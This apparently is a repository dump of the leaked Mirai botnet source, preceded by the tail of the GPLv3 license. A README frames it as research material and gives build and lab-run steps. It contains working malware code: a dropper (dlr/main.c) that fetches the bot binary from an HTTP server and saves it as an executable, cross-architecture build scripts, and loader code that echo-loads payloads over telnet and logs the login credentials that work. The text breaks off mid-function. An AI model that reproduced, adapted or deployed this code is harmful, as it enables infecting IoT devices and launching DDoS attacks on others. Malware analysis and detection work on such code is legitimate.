licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
{one line to give the program's name and a brief idea of what it does.}
Copyright (C) {year} {name of author}
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
{project} Copyright (C) {year} {fullname}
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<http://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<http://www.gnu.org/philosophy/why-not-lgpl.html>.
================================================
FILE: README.md
================================================
# Mirai Source Code
---
## 🔧 Requirements
Before building and running this code, ensure you have the following installed on a **Linux host**:
- `gcc` - GNU Compiler Collection
- `golang` - Go programming language
- `electric-fence` - Memory debugging library
- `mysql-server` - MySQL database server
- `mysql-client` - MySQL database client
- `build-essential` - Essential build tools
- `crossbuild-essential-armel` - Cross-compilation tools for ARM
**Additional Resources:**
- For detailed setup instructions and background information, refer to the original leak post in `ForumPost.txt` or view the formatted version at [ForumPost.md](ForumPost.md).
⚠️ **CRITICAL DISCLAIMER**
This repository contains the leaked source code of the **Mirai botnet**, originally created to infect IoT devices and launch large-scale DDoS attacks. This code is provided **strictly for cybersecurity research, reverse engineering, malware analysis, and detection development purposes only**.
**⚠️ WARNING: Do not use this code to attack or scan any real devices or networks. Unauthorized use is illegal and violates GitHub policy.**
**🛡️ SECURITY NOTICE:** The [zip file](https://www.virustotal.com/en/file/f10667215040e87dae62dd48a5405b3b1b0fe7dbbfbf790d5300f3cd54893333/analysis/1477822491/) for this repo is being identified by some AV programs as malware. Please take caution.
---
## 📋 Table of Contents
- [About Mirai](#-about-mirai)
- [Repository Structure](#-repository-structure)
- [Requirements](#-requirements)
- [How to Use (Lab Research Only)](#️-how-to-use-for-lab-research-only)
- [Learning Use Cases](#-learning-use-cases)
- [Do NOT Use For](#-do-not-use-for)
- [References](#-references)
- [Credits](#-credits)
- [Acknowledgments](#-acknowledgments)
---
## 📌 About Mirai
Mirai is a malware botnet that infects Internet of Things (IoT) devices using default or weak login credentials. Once infected, these devices are controlled by a command-and-control (CnC) server and can be used to launch DDoS attacks.
This repo is a fork of the original leaked source code and includes components such as:
- The bot (runs on IoT devices)
- The CnC server
- The loader (infects devices)
- Scanning and deployment scripts
---
## 📁 Repository Structure
| Folder/File | Description |
|-------------------|-------------------------------------------------------|
| `mirai/` | Core malware source code (bot + CnC server) |
| `loader/` | Infects vulnerable devices using telnet brute-force |
| `dlr/` | Possibly supports payload delivery (optional) |
| `scripts/` | Scripts for building and managing the malware |
| `ForumPost.txt` | Original forum post by author explaining Mirai |
| `LICENSE.md` | License as included in original leak (not official) |
| `README.md` | You’re reading it |
---
## ⚙️ How to Use (FOR LAB RESEARCH ONLY)
> You must use **isolated VMs** or an offline network. Never run this on a real device or public network.
### 🔧 1. Prerequisites
Install on a **Linux host**:
```bash
sudo apt update
sudo apt install gcc make build-essential git crossbuild-essential-armel -y
```
## 🔨 2. Clone the Repository
```bash
git clone https://github.com/jgamblin/Mirai-Source-Code.git
cd Mirai-Source-Code
```
## 🔨 3. Build the Bot and CnC
```bash
./build.sh
```
This will:
* Cross-compile the bot for different IoT architectures (MIPS, ARM, etc.)
* Compile the CnC server for your local machine
You can customize the build script and source code paths if needed.
## 🧪 4. Setup a Test Lab (Recommended)
Create a virtual lab with:
* 1 Ubuntu VM for CnC and loader
* 1 or more OpenWRT/Linux VMs simulating IoT devices
Use Host-Only or Internal Networking mode to keep the lab isolated.
## 🕹 5. Running Components
* Start the CnC server (mirai/cnc/cnc)
* Run the loader to infect virtual IoT VMs
* Observe communication logs, infection, and payload delivery
## ✅ Learning Use Cases
You can use this source code to:
* Understand how botnets spread through weak credentials
* Reverse engineer malware behavior
* Write intrusion detection rules (YARA, Snort, Suricata)
* Develop antivirus and botnet defenses
* Study CnC-to-bot protocol and build simulators
## ❌ Do NOT Use For
* Scanning or infecting real IoT devices
* DDoS attacks
* Deploying the bot to the public internet
Any such use is illegal and against GitHub policy.
## 📚 References
* [Original Leak on Hackforums (2016)](https://hackforums.net/showthread.php?tid=5420472)
* [DDoS Analysis of Mirai by MalwareMustDie](https://blog.malwaremustdie.org/2016/10/mmd-0056-2016-new-mirai-elf-botnet.html)
* [US-CERT Alert TA16-288A](https://www.cisa.gov/news-events/alerts/2016/10/14/alert-ta16-288a)
## 👨💻 Credits
**Original Author:** [Anna-senpai](https://hackforums.net/showthread.php?tid=5420472) - Original Mirai botnet source code leak (2016)
*Note: The original forum appears to be inactive as of now.*
## 🙏 Acknowledgments
Special thanks to [Pushpenderrathore](https://github.com/Pushpenderrathore) for the improved README structure and comprehensive documentation that makes this educational resource more accessible for cybersecurity research.
================================================
FILE: dlr/build.sh
================================================
armv4l-gcc -Os -D BOT_ARCH=\"arm\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm
armv6l-gcc -Os -D BOT_ARCH=\"arm7\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm7
i686-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.x86
m68k-gcc -Os -D BOT_ARCH=\"m68k\" -D M68K -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.m68k
mips-gcc -Os -D BOT_ARCH=\"mips\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mips
#mips64-gcc -Os -D BOT_ARCH=\"mps64\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mps64
mipsel-gcc -Os -D BOT_ARCH=\"mpsl\" -D MIPSEL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mpsl
powerpc-gcc -Os -D BOT_ARCH=\"ppc\" -D PPC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.ppc
sh4-gcc -Os -D BOT_ARCH=\"sh4\" -D SH4 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh4
#sh2elf-gcc -Os -D BOT_ARCH=\"sh2el\" -D SH2EL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2el
#sh2eb-gcc -Os -D BOT_ARCH=\"sh2eb\" -D SH2EB -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2eb
sparc-gcc -Os -D BOT_ARCH=\"spc\" -D SPARC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.spc
armv4l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm
armv6l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm7
i686-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.x86
m68k-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.m68k
mips-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mips
mipsel-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mpsl
powerpc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.ppc
sh4-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.sh4
sparc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.spc
================================================
FILE: dlr/main.c
================================================
#include <sys/types.h>
//#include <bits/syscalls.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP
#define EXEC_MSG "MIRAI\n"
#define EXEC_MSG_LEN 6
#define DOWNLOAD_MSG "FIN\n"
#define DOWNLOAD_MSG_LEN 4
#define STDIN 0
#define STDOUT 1
#define STDERR 2
#if BYTE_ORDER == BIG_ENDIAN
#define HTONS(n) (n)
#define HTONL(n) (n)
#elif BYTE_ORDER == LITTLE_ENDIAN
#define HTONS(n) (((((unsigned short)(n) & 0xff)) << 8) | (((unsigned short)(n) & 0xff00) >> 8))
#define HTONL(n) (((((unsigned long)(n) & 0xff)) << 24) | \
((((unsigned long)(n) & 0xff00)) << 8) | \
((((unsigned long)(n) & 0xff0000)) >> 8) | \
((((unsigned long)(n) & 0xff000000)) >> 24))
#else
#error "Fix byteorder"
#endif
#ifdef __ARM_EABI__
#define SCN(n) ((n) & 0xfffff)
#else
#define SCN(n) (n)
#endif
inline void run(void);
int sstrlen(char *);
unsigned int utils_inet_addr(unsigned char, unsigned char, unsigned char, unsigned char);
/* stdlib calls */
int xsocket(int, int, int);
int xwrite(int, void *, int);
int xread(int, void *, int);
int xconnect(int, struct sockaddr_in *, int);
int xopen(char *, int, int);
int xclose(int);
void x__exit(int);
#define socket xsocket
#define write xwrite
#define read xread
#define connect xconnect
#define open xopen
#define close xclose
#define __exit x__exit
#ifdef DEBUG
/*
void xprintf(char *str)
{
write(1, str, sstrlen(str));
}
#define printf xprintf
*/
#endif
void __start(void)
{
#if defined(MIPS) || defined(MIPSEL)
__asm(
".set noreorder\n"
"move $0, $31\n"
"bal 10f\n"
"nop\n"
"10:\n.cpload $31\n"
"move $31, $0\n"
".set reorder\n"
);
#endif
run();
}
inline void run(void)
{
char recvbuf[128];
struct sockaddr_in addr;
int sfd, ffd, ret;
unsigned int header_parser = 0;
int arch_strlen = sstrlen(BOT_ARCH);
write(STDOUT, EXEC_MSG, EXEC_MSG_LEN);
addr.sin_family = AF_INET;
addr.sin_port = HTONS(80);
addr.sin_addr.s_addr = HTTP_SERVER;
ffd = open("dvrHelper", O_WRONLY | O_CREAT | O_TRUNC, 0777);
sfd = socket(AF_INET, SOCK_STREAM, 0);
#ifdef DEBUG
if (ffd == -1)
printf("Failed to open file!\n");
if (sfd == -1)
printf("Failed to call socket()\n");
#endif
if (sfd == -1 || ffd == -1)
__exit(1);
#ifdef DEBUG
printf("Connecting to host...\n");
#endif
if ((ret = connect(sfd, &addr, sizeof (struct sockaddr_in))) < 0)
{
#ifdef DEBUG
printf("Failed to connect to host.\n");
#endif
write(STDOUT, "NIF\n", 4);
__exit(-ret);
}
#ifdef DEBUG
printf("Connected to host\n");
#endif
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))
{
#ifdef DEBUG
printf("Failed to send get request.\n");
#endif
__exit(3);
}
#ifdef DEBUG
printf("Started header parse...\n");
#endif
while (header_parser != 0x0d0a0d0a)
{
char ch;
int ret = read(sfd, &ch, 1);
if (ret != 1)
__exit(4);
header_parser = (header_parser << 8) | ch;
}
#ifdef DEBUG
printf("Finished receiving HTTP header\n");
#endif
while (1)
{
int ret = read(sfd, recvbuf, sizeof (recvbuf));
if (ret <= 0)
break;
write(ffd, recvbuf, ret);
}
close(sfd);
close(ffd);
write(STDOUT, DOWNLOAD_MSG, DOWNLOAD_MSG_LEN);
__exit(5);
}
int sstrlen(char *str)
{
int c = 0;
while (*str++ != 0)
c++;
return c;
}
unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsigned char three, unsigned char four)
{
unsigned long ip = 0;
ip |= (one << 24);
ip |= (two << 16);
ip |= (three << 8);
ip |= (four << 0);
return HTONL(ip);
}
int xsocket(int domain, int type, int protocol)
{
#if defined(__NR_socketcall)
#ifdef DEBUG
printf("socket using socketcall\n");
#endif
struct {
int domain, type, protocol;
} socketcall;
socketcall.domain = domain;
socketcall.type = type;
socketcall.protocol = protocol;
// 1 == SYS_SOCKET
int ret = syscall(SCN(SYS_socketcall), 1, &socketcall);
#ifdef DEBUG
printf("socket got ret: %d\n", ret);
#endif
return ret;
#else
#ifdef DEBUG
printf("socket using socket\n");
#endif
return syscall(SCN(SYS_socket), domain, type, protocol);
#endif
}
int xread(int fd, void *buf, int len)
{
return syscall(SCN(SYS_read), fd, buf, len);
}
int xwrite(int fd, void *buf, int len)
{
return syscall(SCN(SYS_write), fd, buf, len);
}
int xconnect(int fd, struct sockaddr_in *addr, int len)
{
#if defined(__NR_socketcall)
#ifdef DEBUG
printf("connect using socketcall\n");
#endif
struct {
int fd;
struct sockaddr_in *addr;
int len;
} socketcall;
socketcall.fd = fd;
socketcall.addr = addr;
socketcall.len = len;
// 3 == SYS_CONNECT
int ret = syscall(SCN(SYS_socketcall), 3, &socketcall);
#ifdef DEBUG
printf("connect got ret: %d\n", ret);
#endif
return ret;
#else
#ifdef DEBUG
printf("connect using connect\n");
#endif
return syscall(SCN(SYS_connect), fd, addr, len);
#endif
}
int xopen(char *path, int flags, int other)
{
return syscall(SCN(SYS_open), path, flags, other);
}
int xclose(int fd)
{
return syscall(SCN(SYS_close), fd);
}
void x__exit(int code)
{
syscall(SCN(SYS_exit), code);
}
================================================
FILE: loader/build.debug.sh
================================================
#!/bin/bash
gcc -lefence -g -DDEBUG -static -lpthread -pthread -O3 src/*.c -o loader.dbg
================================================
FILE: loader/build.sh
================================================
#!/bin/bash
gcc -static -O3 -lpthread -pthread src/*.c -o loader
================================================
FILE: loader/src/binary.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <glob.h>
#include "headers/includes.h"
#include "headers/binary.h"
static int bin_list_len = 0;
static struct binary **bin_list = NULL;
BOOL binary_init(void)
{
glob_t pglob;
int i;
if (glob("bins/dlr.*", GLOB_ERR, NULL, &pglob) != 0)
{
printf("Failed to load from bins folder!\n");
return;
}
for (i = 0; i < pglob.gl_pathc; i++)
{
char file_name[256];
struct binary *bin;
bin_list = realloc(bin_list, (bin_list_len + 1) * sizeof (struct binary *));
bin_list[bin_list_len] = calloc(1, sizeof (struct binary));
bin = bin_list[bin_list_len++];
#ifdef DEBUG
printf("(%d/%d) %s is loading...\n", i + 1, pglob.gl_pathc, pglob.gl_pathv[i]);
#endif
strcpy(file_name, pglob.gl_pathv[i]);
strtok(file_name, ".");
strcpy(bin->arch, strtok(NULL, "."));
load(bin, pglob.gl_pathv[i]);
}
globfree(&pglob);
return TRUE;
}
struct binary *binary_get_by_arch(char *arch)
{
int i;
for (i = 0; i < bin_list_len; i++)
{
if (strcmp(arch, bin_list[i]->arch) == 0)
return bin_list[i];
}
return NULL;
}
static BOOL load(struct binary *bin, char *fname)
{
FILE *file;
char rdbuf[BINARY_BYTES_PER_ECHOLINE];
int n;
if ((file = fopen(fname, "r")) == NULL)
{
printf("Failed to open %s for parsing\n", fname);
return FALSE;
}
while ((n = fread(rdbuf, sizeof (char), BINARY_BYTES_PER_ECHOLINE, file)) != 0)
{
char *ptr;
int i;
bin->hex_payloads = realloc(bin->hex_payloads, (bin->hex_payloads_len + 1) * sizeof (char *));
bin->hex_payloads[bin->hex_payloads_len] = calloc(sizeof (char), (4 * n) + 8);
ptr = bin->hex_payloads[bin->hex_payloads_len++];
for (i = 0; i < n; i++)
ptr += sprintf(ptr, "\\x%02x", (uint8_t)rdbuf[i]);
}
return FALSE;
}
================================================
FILE: loader/src/connection.c
================================================
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <pthread.h>
#include "headers/includes.h"
#include "headers/connection.h"
#include "headers/server.h"
#include "headers/binary.h"
#include "headers/util.h"
void connection_open(struct connection *conn)
{
pthread_mutex_lock(&conn->lock);
conn->rdbuf_pos = 0;
conn->last_recv = time(NULL);
conn->timeout = 10;
conn->echo_load_pos = 0;
conn->state_telnet = TELNET_CONNECTING;
conn->success = FALSE;
conn->open = TRUE;
conn->bin = NULL;
conn->echo_load_pos = 0;
#ifdef DEBUG
printf("[FD%d] Called connection_open\n", conn->fd);
#endif
pthread_mutex_unlock(&conn->lock);
}
void connection_close(struct connection *conn)
{
pthread_mutex_lock(&conn->lock);
if (conn->open)
{
#ifdef DEBUG
printf("[FD%d] Shut down connection\n", conn->fd);
#endif
memset(conn->output_buffer.data, 0, sizeof(conn->output_buffer.data));
conn->output_buffer.deadline = 0;
conn->last_recv = 0;
conn->open = FALSE;
conn->retry_bin = FALSE;
conn->ctrlc_retry = FALSE;
memset(conn->rdbuf, 0, sizeof(conn->rdbuf));
conn->rdbuf_pos = 0;
if (conn->srv == NULL)
{
printf("srv == NULL\n");
return;
}
if (conn->success)
{
ATOMIC_INC(&conn->srv->total_successes);
fprintf(stderr, "OK|%d.%d.%d.%d:%d %s:%s %s\n",
conn->info.addr & 0xff, (conn->info.addr >> 8) & 0xff, (conn->info.addr >> 16) & 0xff, (conn->info.addr >> 24) & 0xff,
ntohs(conn->info.port),
conn->info.user, conn->info.pass, conn->info.arch);
}
else
{
ATOMIC_INC(&conn->srv->total_failures);
fprintf(stderr, "ERR|%d.%d.%d.%d:%d %s:%s %s|%d\n",
conn->info.addr & 0xff, (conn->info.addr >> 8) & 0xff, (conn->info.addr >> 16) & 0xff, (conn->info.addr >> 24) & 0xff,
ntohs(conn->info.port),
conn->info.user, conn->info.pass, conn->info.arch,
conn->state_telnet);
}
}
conn->state_telnet = TELNET_CLOSED;
if (conn->fd != -1)
{
close(conn->fd);
conn->fd = -1;
ATOMIC_DEC(&conn->srv->curr_open);
}
pthread_mutex_unlock(&conn->lock);
}
int connection_consume_iacs(struct connection *conn)
{
int consumed = 0;
uint8_t *ptr = conn->rdbuf;
while (consumed < conn->rdbuf_pos)
{
int i;
if (*ptr != 0xff)
break;
else if (*ptr == 0xff)
{
if (!can_consume(conn, ptr, 1))
break;
if (ptr[1] == 0xff)
{
ptr += 2;
consumed += 2;
continue;
}
else if (ptr[1] == 0xfd)
{
uint8_t tmp1[3] = {255, 251, 31};
uint8_t tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240};
if (!can_consume(conn, ptr, 2))
break;
if (ptr[2] != 31)
goto iac_wont;
ptr += 3;
consumed += 3;
send(conn->fd, tmp1, 3, MSG_NOSIGNAL);
send(conn->fd, tmp2, 9, MSG_NOSIGNAL);
}
else
{
iac_wont:
if (!can_consume(conn, ptr, 2))
break;
for (i = 0; i < 3; i++)
{
if (ptr[i] == 0xfd)
ptr[i] = 0xfc;
else if (ptr[i] == 0xfb)
ptr[i] = 0xfd;
}
send(conn->fd, ptr, 3, MSG_NOSIGNAL);
ptr += 3;
consumed += 3;
}
}
}
return consumed;
}
int connection_consume_login_prompt(struct connection *conn)
{
char *pch;
int i, prompt_ending = -1;
for (i = conn->rdbuf_pos; i >= 0; i--)
{
if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
{
#ifdef DEBUG
printf("matched login prompt at %d, \"%c\", \"%s\"\n", i, conn->rdbuf[i], conn->rdbuf);
#endif
prompt_ending = i;
break;
}
}
if (prompt_ending == -1)
{
int tmp;
if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ogin", 4)) != -1)
prompt_ending = tmp;
else if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "enter", 5)) != -1)
prompt_ending = tmp;
}
if (prompt_ending == -1)
return 0;
else
return prompt_ending;
}
int connection_consume_password_prompt(struct connection *conn)
{
char *pch;
int i, prompt_ending = -1;
for (i = conn->rdbuf_pos; i >= 0; i--)
{
if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
{
